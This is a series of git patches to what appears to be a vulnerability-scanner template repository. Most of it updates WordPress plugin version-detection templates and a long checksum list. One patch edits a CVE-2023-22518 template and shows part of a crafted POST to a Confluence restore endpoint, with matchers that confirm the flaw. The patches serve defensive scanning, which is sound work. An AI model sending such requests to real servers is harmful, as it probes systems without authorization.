wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100938d7cf181afe0dc8cd83303d27771e0863168a1e9d0842c928e0cf991826111022048fd9877eda36882a0e42225e0943c6505dc483746515c128fc6d05ba7168eb1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 4d663ed6a2..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ec24b743343a69dbc65eda22565e5dfd7e8e1ed74bf5eda9f5759f1a914e1772022022ef4c8c424901518935c8a88c2362b4253f9c5e7995d456d7ca1941a2f9b22b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 39ed96a848..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/wpvivid-backuprestore/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022031f66df753bb5cd0b0217080aa2d1e0649541c734c2591a067eeff9c3020b39902200559cace647303493109ebca744e3e7afe152faaa78db061a290d7e7f6d1bde4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 583e2d5fc2..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220462ed0f05fbddfc565678413fbc441606856e13823742daa82effe2cf4fc42df022100fae2f90533fd1337ea994102fd47e5884d013f65ba0ada580f6bee3f3d4f53ab:922c64590222798bb761d5b6d8e72950 From b936ac7af8948020a2977b5fd0dfb63433548f43 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 3 Nov 2023 11:35:05 +0530 Subject: [PATCH 06/36] Updated CVE-2023-22518 --- http/cves/2023/CVE-2023-22518.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index f90580ef7f..a87c099d40 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -33,7 +33,6 @@ http: POST /json/setup-restore.action HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7 - X-Atlassian-Token: no-check ------WebKitFormBoundaryT3yekvo0rGaL9QR7 Content-Disposition: form-data; name="buildIndex" @@ -55,4 +54,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 4b0a00483046022100db845fade39b9ca175a9d14b955c502455c685b2a42fe3e87ee36df72d9ebfeb022100a0e2045354799014789f4de9555b5f4ad9411b9b79a80bd0e77012e5e51bf955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db845fade39b9ca175a9d14b955c502455c685b2a42fe3e87ee36df72d9ebfeb022100a0e2045354799014789f4de9555b5f4ad9411b9b79a80bd0e77012e5e51bf955:922c64590222798bb761d5b6d8e72950 From a61c8d2772df39dac67b20b93202834fce51b446 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 06:13:25 +0000 Subject: [PATCH 08/36] Auto Generated Templates Checksum [Fri Nov 3 06:13:25 UTC 2023] :robot: --- templates-checksum.txt | 420 ++++++++++++++++++++--------------------- 1 file changed, 210 insertions(+), 210 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 508ade1b08..7fd1002f1a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -376,12 +376,12 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:b071da3eacefc38f86d5c19f67 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:720901cc15011491c5736a7c66be0da045ae177d helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 helpers/wordpress/plugins/antispam-bee.txt:bd5240b767bb950186835acb8bf1d4cb794a5706 -helpers/wordpress/plugins/astra-sites.txt:d8521792e123691f48a1df559885c477069c6c1d +helpers/wordpress/plugins/astra-sites.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/backwpup.txt:9a0a06f6eb18bf496057acce15162dc100f43480 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/better-wp-security.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 +helpers/wordpress/plugins/better-wp-security.txt:7eeb06a01f4ae5eb5f19f92912179730549bd1ef helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b helpers/wordpress/plugins/breeze.txt:28b121576d24951ab1e0f303065d2b01100e36c7 @@ -447,7 +447,7 @@ helpers/wordpress/plugins/header-footer-elementor.txt:e6657339eaafc90d6f3c5a5946 helpers/wordpress/plugins/header-footer.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 -helpers/wordpress/plugins/host-webfonts-local.txt:57efd6c9af996d49184c10d2eb37abea3ad4614c +helpers/wordpress/plugins/host-webfonts-local.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee helpers/wordpress/plugins/imagify.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 helpers/wordpress/plugins/imsanity.txt:127ff004f8eef50a85abd75d168e497de8d9a88d helpers/wordpress/plugins/insert-headers-and-footers.txt:3e36996d5a31e07713bdadaefd78f5f6d2277263 @@ -459,7 +459,7 @@ helpers/wordpress/plugins/jetpack.txt:dbcae175e315b5e7bb9a7bced6f1441b377ed267 helpers/wordpress/plugins/kadence-blocks.txt:4b9537ac12fb9fa1759e227151b04865b3bed4c0 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa helpers/wordpress/plugins/leadin.txt:78702f4ab9863ce2deba27117b027181e59b6e3d -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:4b37c29fba8babd654bfb5f26219010dd1bf03f8 +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:ebc71869ccc22bf69e203d41bafb4b7d5ec66d29 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:76bfe435359baea4a37124005ae50b88a655f8eb helpers/wordpress/plugins/loco-translate.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 @@ -512,7 +512,7 @@ helpers/wordpress/plugins/shortpixel-image-optimiser.txt:c4220954772525d32e725d9 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:156c5ea92bcb32857c9703e2f7f5b16cfdd9e33b -helpers/wordpress/plugins/siteorigin-panels.txt:da4b82ba6a9f004842d1055f24eaf0fcb3917688 +helpers/wordpress/plugins/siteorigin-panels.txt:cf5de0956cdcebb99756db91b172eb709ee12192 helpers/wordpress/plugins/smart-slider-3.txt:2cddd46563a1ae6eca28eb577f99025fd04568f2 helpers/wordpress/plugins/so-widgets-bundle.txt:eeb0b2ba8e589770f19bb43e6c0684cbbc3aae9a helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 @@ -520,7 +520,7 @@ helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c helpers/wordpress/plugins/sucuri-scanner.txt:223960ccc78aab169c55e54fb7d9ed6bf1fd29d9 helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 helpers/wordpress/plugins/table-of-contents-plus.txt:9366fd51e17e65e8d9a6aae9f08e1553e1b8170e -helpers/wordpress/plugins/tablepress.txt:248fa1629a5449451dde60521b10f8d16f52b23d +helpers/wordpress/plugins/tablepress.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/taxonomy-terms-order.txt:d2a825593d236a4bdf4eeecfe093c2f0318fc0f9 helpers/wordpress/plugins/the-events-calendar.txt:5c8e7c9787ae3290835412a23084eeb8bc35e1ec helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf @@ -552,7 +552,7 @@ helpers/wordpress/plugins/wordfence.txt:4faef773aa0d77d0272c262de736b14e338e877e helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 helpers/wordpress/plugins/wordpress-seo.txt:d17a3b6342d69046ccc807a9ece21a00689553c0 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-fastest-cache.txt:4acc7d8ff2a07c5724b61e524ae1a2782dc80e96 +helpers/wordpress/plugins/wp-fastest-cache.txt:94dcef061335413abfdb9c1ca0b391b7bf178b90 helpers/wordpress/plugins/wp-file-manager.txt:f0e80e9d8b6e35e4d07b971ea614c40d8ec4efa3 helpers/wordpress/plugins/wp-google-maps.txt:ad9afea0b54b56a5454f9b118b72c6199969a44e helpers/wordpress/plugins/wp-mail-smtp.txt:27e1606dc0a2a0c2fa59fc7f5fefdaeacc0b2794 @@ -564,7 +564,7 @@ helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b helpers/wordpress/plugins/wp-reset.txt:299ef94535e5fc122da1afbd80be0ba4f6f99c3e helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:5388cb4970f515020c5073c611a658694b0b5606 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad -helpers/wordpress/plugins/wp-seopress.txt:7e27230ba01bbc53968feca07aae81d544d0a7c6 +helpers/wordpress/plugins/wp-seopress.txt:e04ca063b6845d470c10139c5272853c062aa84e helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c helpers/wordpress/plugins/wp-statistics.txt:3b876b7e97baf475486d739676060457743d83c2 @@ -2616,7 +2616,7 @@ http/cves/2023/CVE-2023-22463.yaml:d2440a47082ab058aabcb2ca3655fce7305bc37e http/cves/2023/CVE-2023-22478.yaml:c62d76dd2ea11531093a0569fb16255f67211392 http/cves/2023/CVE-2023-22480.yaml:c89ac259667de547b9d4dde653a4f0ea5b47c7d6 http/cves/2023/CVE-2023-22515.yaml:7811582f649c5efef338ffa8fc7d123feb7b66e4 -http/cves/2023/CVE-2023-22518.yaml:1a48f58b2c5273a055d8441503b5b398ce6037ff +http/cves/2023/CVE-2023-22518.yaml:c50845936bfed273a771fa8638acb95aeab42c6d http/cves/2023/CVE-2023-2252.yaml:bb02189bc936b107119e8db698983075c295bb78 http/cves/2023/CVE-2023-22620.yaml:d17b60c3caac0cf4bee31e6d9700899a1c8a41a2 http/cves/2023/CVE-2023-2272.yaml:8273092cf0ee581de5f8b05df388aa571c7e5f1d @@ -6098,219 +6098,219 @@ http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:d6ae1ba7d43fc095dc38831e2f10f95d205716af -http/technologies/wordpress/plugins/add-to-any.yaml:91ac25e29f306a412d94095d4975ed4a7fde1738 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:0af763be403a36b2b9a724c612c27996438986f0 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9108d26867f97f18c024151aea53d13e5d6beccd -http/technologies/wordpress/plugins/akismet.yaml:03b828e541e79bc22edf6b424715f5f126bfbf1f -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:21a26e536cfd70813f7f0182c8e16c0e7568e62f -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:6b475df1e24c20aa543ca74e9909a0539dbb1d35 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c1638c24d8e17564a719baaec372d63975064aa1 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:173fdea53cd26fb970853769e6ff00fc9492d981 -http/technologies/wordpress/plugins/amp.yaml:cce5bf252a008cb93f216da7f93e4ec655fa42d5 -http/technologies/wordpress/plugins/antispam-bee.yaml:7074c8a025649732e771bc20133c005f98eb2129 -http/technologies/wordpress/plugins/astra-sites.yaml:cbc602fb7bceec052ff7efe58c4a6cbe7ffac324 -http/technologies/wordpress/plugins/astra-widgets.yaml:81dc1f16f2e1a13c6c78bdffb382a519d548090b -http/technologies/wordpress/plugins/autoptimize.yaml:c78c905ffb4637a72f4dd8316360f1ea079501b7 -http/technologies/wordpress/plugins/backwpup.yaml:5f925649f8270380c569724d41b2bb0dbc707f42 -http/technologies/wordpress/plugins/better-search-replace.yaml:fee5daef12b6628e376e8d39cbe4e5463cc65867 -http/technologies/wordpress/plugins/better-wp-security.yaml:a8b91add8835ece6ca75aa2469cd69631a934f82 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cb7482caa74a314deaa4c5450c97148bf70290d4 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:7445165426d7559a6abf0fa354b288a80661ef6c -http/technologies/wordpress/plugins/breeze.yaml:f94fc9678e456b1e98ee7c2b7c91954ffdcfae9e -http/technologies/wordpress/plugins/broken-link-checker.yaml:0c68287ae7ff5ea38f4463c1132456e28aafb0e7 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:b1e9ca565277a9b7497b702e0cd0985d151f7cef -http/technologies/wordpress/plugins/classic-editor.yaml:c02b43ab262ae9ac88cd420b8b74ba5d4a97245d -http/technologies/wordpress/plugins/classic-widgets.yaml:21f2068f8e7fb7261525ada38867bd7916d84ef2 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:413f0e05b71631a50b8a766d0cfeb24bee328e15 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:d900c2379d43991267ec7017d6b1a084216a1e73 -http/technologies/wordpress/plugins/coblocks.yaml:82d24840ce16a7a78a7613a44eaf0ee1ad4046a0 -http/technologies/wordpress/plugins/code-snippets.yaml:78e636f7f15a3c71cc5e9897e51cd46555d7d14d -http/technologies/wordpress/plugins/coming-soon.yaml:ebd68b5c9908a2d99788055c6378874034fe7b07 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:cc044861926e92e34ab67e43d7aabfe469b8a63c -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:e0296d6ed317a2e0b5a05fbe896c2e621d3b9bcd -http/technologies/wordpress/plugins/contact-form-7.yaml:1f97eeb3199aeae975778dbd34ee6805513bb60f -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:54d0129db7344cd9697bb9b71e9fe6b425a5436d -http/technologies/wordpress/plugins/cookie-law-info.yaml:fd781f47130736ba9df85d9d3714464729f88793 -http/technologies/wordpress/plugins/cookie-notice.yaml:521f3a79cf59a0d24a5b0451dde4fe7eaefb01f7 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:4f6ce730970d329cbd02cf5a525858c5293dd32b -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:f82020477312e0b5814bdb3ed59139f63ff72fd4 -http/technologies/wordpress/plugins/custom-css-js.yaml:9609fc8530a1de930c9f590e6b5f6648969f9aa5 -http/technologies/wordpress/plugins/custom-fonts.yaml:a7b74ac7ee8010a1a440c1a2041cfcedfd04c44c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:cb55c22752cca5fbde8a25e5515b4d13e065f0c7 -http/technologies/wordpress/plugins/disable-comments.yaml:7a2dd3c6729e46695d7f11625af37e9f28c570e5 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:cac3c24d5e2bb8fa9731ed1d7f13fc635192d665 -http/technologies/wordpress/plugins/duplicate-page.yaml:ca5729abea44b10585e17d14b55c47616a335757 -http/technologies/wordpress/plugins/duplicate-post.yaml:90087c6da7f48527e6ffc5345f16ce952b784290 -http/technologies/wordpress/plugins/duplicator.yaml:89d20814e8829453f47035886229c51e4a4beedc -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:5e757b5880703b232cb83973b64f4cd049f3d901 -http/technologies/wordpress/plugins/easy-fancybox.yaml:b87756429115276b1d2fcb6909783b8b5b0781a6 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:83f33a2c6597e99dda9fa74af16fa13b9b12aaca -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:8230c324a93066b0139e34b928bd30c9b9a3bbcc -http/technologies/wordpress/plugins/elementor.yaml:8b0e1de9b976b8cfc19352faac1668722d2c99ce -http/technologies/wordpress/plugins/elementskit-lite.yaml:90af49424e8278b951caba8e0ad36fa784428da8 -http/technologies/wordpress/plugins/enable-media-replace.yaml:233d537485b368b195ce943d5c2448dede8c05ba -http/technologies/wordpress/plugins/envato-elements.yaml:dade226a3a0068b2923901b1ab0ef56190ebc618 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:ba454241ae76d52b9ae9b204359dd646462edcba -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:39fb80b7749d9511c71e54454f47d63c0ba27e77 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:4f851c6a2efcb0e1c04d7453ed6a7d72f9776f0a -http/technologies/wordpress/plugins/fast-indexing-api.yaml:d23ffff9a1fb971550cec311d8acc08d76bbb39d -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:8e84d99c5bac60897f6e43c8d782a3f357960001 -http/technologies/wordpress/plugins/flamingo.yaml:af1d48e4a3a66f2c17ee498b1659d3898c195751 -http/technologies/wordpress/plugins/fluentform.yaml:b4fa7aed1916357dee06f0ad51c4165463114dc6 -http/technologies/wordpress/plugins/font-awesome.yaml:4aebfcde804830b842caea8a488514f59495d08c -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:7b8494212d422e7d46eb8f19b1ee9d989a9d2202 -http/technologies/wordpress/plugins/formidable.yaml:d7c3430659ec5b19c61292c4c7a53709bf8a3bd8 -http/technologies/wordpress/plugins/forminator.yaml:e7ee3da8f6f7813d596972827584c962ad714340 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:051d909df1c66a9634875d8cefdf01f4e3079bb1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:a290ff1ebf7ae7fcc0fb6db60b32ca1062c93328 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:4187439bf4d162c31701cf1afaa33935e4e4033c -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:6c47f86977350d544ccab08fcc5ec2946a28c07f -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:2417d0f007798856d25e1fb045bc59a19309154e -http/technologies/wordpress/plugins/google-site-kit.yaml:345610a8cbb1ea2502078bc579614aa2c01123f3 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b9a482c5a9dae0e6e641aa6661cfc20274ede1ed -http/technologies/wordpress/plugins/gtranslate.yaml:b83ff401daac3c1d5565135ec2f832d236d8956b -http/technologies/wordpress/plugins/gutenberg.yaml:00c7da8c358b418fe5121620f0b3d900ada40eb4 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:53fa96307b6eacc4c2591199406862f928b52a08 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:5fdb275f35683cea75e69608a0d6360fd6ad72ff +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 